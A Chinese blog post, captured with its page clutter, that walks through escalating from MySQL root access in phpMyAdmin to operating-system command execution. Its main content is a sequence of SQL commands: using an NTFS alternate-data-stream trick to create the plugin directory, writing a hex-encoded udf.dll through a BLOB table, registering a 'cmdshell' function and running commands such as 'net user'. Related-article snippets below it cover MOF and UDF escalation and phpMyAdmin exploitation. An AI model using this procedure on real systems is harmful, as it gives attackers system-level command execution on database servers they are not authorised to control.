mysql ntfs 提权 (errcode: 22),PhpMyAdmin UDF 提权的方法有哪些?

最新推荐文章于 2022-08-07 09:05:03 发布
最新推荐文章于 2022-08-07 09:05:03 发布
阅读量196 收藏
点赞数
文章标签: mysql ntfs 提权 (errcode: 22)

适用环境:PhpMyAdmin 3.x + MySQL5.x

前提条件: 有MYSQL的ROOT权限,无Shell ,无法爆绝对路径

思路:利用NTFS ADS创建 plugin目录 ---- 导出UDF

过程:

查询 select @@basedir  (或者 select @@datadir)

得到MySQL目录 C:\MySql\

假如该目录不存在\lib\plugin目录,利用ADS创建

查询 select 'xxx' into dumpfile 'C:\\MySQL\\lib::$INDEX_ALLOCATION';

此时会报错

ERROR 3 (HY000): Error writing file 'C:\MySQL\lib::$INDEX_ALLOCATION' (Errcode: 22)

但是lib目录已经创建了

再查询  select 'xxx' into dumpfile 'C:\\MySQL\\lib\\plugin::$INDEX_ALLOCATION';

导出UDF.DLL

随便选一个库

查询 CREATE TABLE Temp_udf(udf BLOB);

查询 INSERT into Temp_udf values (CONVERT($shellcode,CHAR));   //$shellcode请用UDF用hex加密后的代码,地址在下面

查询 SELECT udf FROM Temp_udf INTO DUMPFILE 'C:\\MySQL\\lib\\plugin\\udf.dll';--

提权

查询 Create function cmdshell returns string soname 'udf.dll';  //此处不能填绝对路径 只能是dll名

查询 select * from mysql.func;                  //看看cmdshell function是否创立,创立就继续

查询 select cmdshell('net user');               //运行各种命令

你磊哥我啊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql ntfs 提权 (errcode: 22)_NTFS ADS带来的WEB安全问题
weixin_35837856的博客
02-17 317
如今的文件上传漏洞突破日益困难,各种花式绕过方式也被防御的死死的,但想必NTFS ADS这种在实战中用到的还是相对较少,尤其是它所附带的后门隐藏效果,对于我们在日常渗透中也会有很大助益,这里分享一篇关于此的文章。注:文中图片均可点击放大查看!看不清楚直接点击查看即可!可以看到ADS在很久以前就被一些安全人员所关注,并且也提出了一些经典的利用,比如隐藏文件,隐藏webshell(http://blo...
mysql ntfs 提权 (errcode: 22)_mysql提权总结 - osc_cveqtg0x的个人空间 - OSCHINA - 中文开源技术交流社区...
weixin_33085941的博客
02-17 70
一、mof提权windows管理规范提供了以下三种方法编译到WMI存储库的托管对象格式(MOF)文件:1、运行MOF文件指定为命令行参数讲Mofcomp.exe文件。2、使用IMofCompiler接口和$CompileFile方法。3、拖放到%SystemRoot%\System32\Wbem\MOF文件夹的MOF文件。Micrsoft建议您到存储库编译MOF文件使用前两种方法。也就是运行Mof...
mysql mmsql 提权区别_mysql 提权总结
weixin_42402188的博客
01-27 124
1.MOF提权简单的说mof就是系统内部的一个程序,每隔一定时间系统就会以root权限去执行,我们将其替换然后执行我们的而已攻击代码。此举称之为mof提权。以下便是脚本:1 #pragma namespace("\\\\.\\root\\subscription")23 instance of __EventFilter as$EventFilter4 {5 EventNamespace ...
phpMyadmin提权那些事
dfdhxb995397的博客
06-01 346
i春秋作家:anyedt phpMyadmin提权那些事 引言:在渗透测试过程中获知到phpMyadmin的账号密码,如何进行提权呢?往下看,我今天和你说说phpMyadmin提权那些事。 0×00 定义 ​ phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。 ...
UDF 提权
震山的博客
08-07 1131
关于 UDF 提权的思考
MySQL4 File ‘c:\mysql\share\charsets\?.conf’ not found (Errcode: 22)的解决方法
12-15
.conf’ not found (Errcode: 22) Character set ‘#33′ is not a compiled character set and is not specified in the ‘c:\mysql\share\charsets\Index’ file 查阅一番后基本可以确定原因为低版本的PHP和高版本...
php mysql Errcode: 28 终极解决方法
01-20
1246200383 and hide = ‘n’ and type=’blog’ ORDER BY date DESC LIMIT 1 Error writing file ‘C:\WINDOWS\TEMP\MY9B6F.tmp’ (Errcode: 28) 解决方法: 1.释放C:\WINDOWS\TEMP\空间 2.因为原表太大,所以查询...
MySQL 启动报错:File ./mysql-bin.index not found (Errcode: 13)
09-10
MySQL数据库在启动时可能会遇到各种错误,其中一种常见的报错是"File ./mysql-bin.index not found (Errcode: 13)"。这个错误通常表明MySQL无法找到它的二进制日志索引文件(mysql-bin.index),并且错误代码13通常...
mysql errcode 22 myi_Errcode: 17 - File exists
weixin_27058835的博客
01-27 215
#0fill_schema_table_by_open (thd=0x2293ee0,is_show_fields_or_keys=true, table=0x7fbed405c310,schema_table=0x1531980, orig_db_name=0x7fbf00dfea20,orig_table_name=0x7fbf00dfea10,open_tables_state_backup...
mysql errcode 22 myi_[置頂] MySQL報錯 Errcode:28
weixin_30242741的博客
02-07 142
錯誤信息:A MySQL error was encountered. The message is; Cannot fecch table information.The following error occured:Can't create/write to file'/tmp/#sql_1594_0.MYI'(Errcode:28) 解決方案:1. 看了下具體錯誤代碼mysql> \...
mysql errcode 22 myi_Mysql报错 can't create/write to file '/tmp@sql_1aaf3_0.MYI'(Errcode:13 - Permissi...
weixin_39658619的博客
01-27 195
1.用navicat连接Mysql操作时一直提示“can't create/write to file '/tmp@sql_1aaf3_0.MYI'(Errcode:13 - Permission denied)”,但链接其他数据库能正常操作;2.登录服务器用 mysql -u root -p登录时提示ERROR 2002 (HY000): Can't connect to local MySQL...
phpmyadmin mysql提权_Mysql+PHPmyadmin 提权技巧
weixin_32338107的博客
01-26 210
软件安装:装机软件必备包随着网络的普及,我们的生活越来越方便,但是网络安全也成了很多人面临的一个问题。特别是那些有着商业数据的企业电脑,更要注意上网安全常识,不然病毒会对我们造成严重的威胁。1:phpmyadmin后台拿webshellphpmyadmin爆路径方法:weburl+phpmyadmin/themes/darkblue_orange/layout.inc.phphttp://url...
Mysql提权UDF提权
一个普普通通的博客
04-17 898
数据库提权较为实用,但只有在root权限才可以提权 mysql提权udf提权) 借用于mysql func,对认证的用户,只要拥有INSERT和DELETE权限,就可以在任意数据库下l创建一个函数攻击数据库 拿到webshell后先看数据库,一般存放于inc目录,配置文件是config.php 拿到账号密码直接登录 传udf.dll mysql版本大于5.1时,udf.dll要放在mysql\lib\plugin目录下,小于5.1时,文件放在C盘windows目录或windows32 如果没有plug
Mysql udf提权(Linux平台)
热门推荐
3569
12-17 2万+
http://vinc.top/2017/04/19/mysql-udf%E6%8F%90%E6%9D%83linux%E5%B9%B3%E5%8F%B0/ UDFMySQL的一个共享库,通过udf创建能够执行系统命令的函数sys_exec、sys_eval,使得入侵者能够获得一般情况下无法获得的shell执行权限 网上有些文章利用的是sqlmap-master\udf\mysq
关于PHPMYADMIN的入侵提权拿服务器
u011500307的专栏
12-01 1万+
转自:http://hi.baidu.com/0o1znz1ow/item/651d3bddbd9b7cf03cc2cb1e 作者不详 关于PHPMYADMIN的入侵提权拿服务器 1.今天收到客户一个单子,说是要黑一台电影服务器,然后给了我IP 61.147.*.* 打开网站一看,发现是用FLEAPHP写的一个程序 因为刚好在研究FLEAPHP开源开发系统,大致了
mysql udf 提权
完美落地
12-06 848
mysqludf提权方法 01 May 2013 UDF(用户定义函数)是一类对MYSQL服务器功能进行扩充的代码,通常是用C(或C++)写的。通过添加新函数,性质就象使用本地MYSQL函数abs()或concat()。当你需要扩展MYSQL服务器功能时,UDF通常是最好的选择。但同时,UDF也是黑客们在拥有低权限mysql账号时比较好用的一种提权方法。 适用场合: 1、目标主机系...
MySQL UDF提权
小水池
08-08 9066
0x00 原理 udf = ‘user defined function‘,即‘用户自定义函数’。文件后缀为‘.dll’,常用c语言编写。 通过在udf文件中定义新函数,对MYSQL的功能进行扩充,可以执行系统任意命令。将MYSQL账号root转化为系统system权限。   0x01 思路   1. 将udf文件上传到指定位置  sqlmap中有现成的udf文件,分为32位和64位...
PhpMyAdmin漏洞利用汇总
艾欧尼亚归我了
10-18 1256
PhpMyAdmin漏洞利用汇总 目录 0x01 信息收集 1.1 版本信息获取 1.2 绝对路径获取 0x02 PhpMyAdmin利用 2.1 写入文件GetShell 2.2 User defined funct ion(UDF): 2.3 MOF提权: 0x03 PhpMyAdmin漏洞利用 3.1 WooYun-2016-199433:任意文件读取漏洞 3.2 CVE-2014 -8959:本地文件包含 3.3 CVE-2016-5734 :后台命令执行R
mysql (Errcode: 13 - Permission denied)
最新发布
09-15
MySQL启动时出现错误代码13 - Permission denied时,这意味着MySQL无法访问特定的文件或目录。这可能是由于缺少必要的权限所致。 解决这个问题的一种方法是给表空间赋予适当的权限。可以使用以下命令将表空间的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值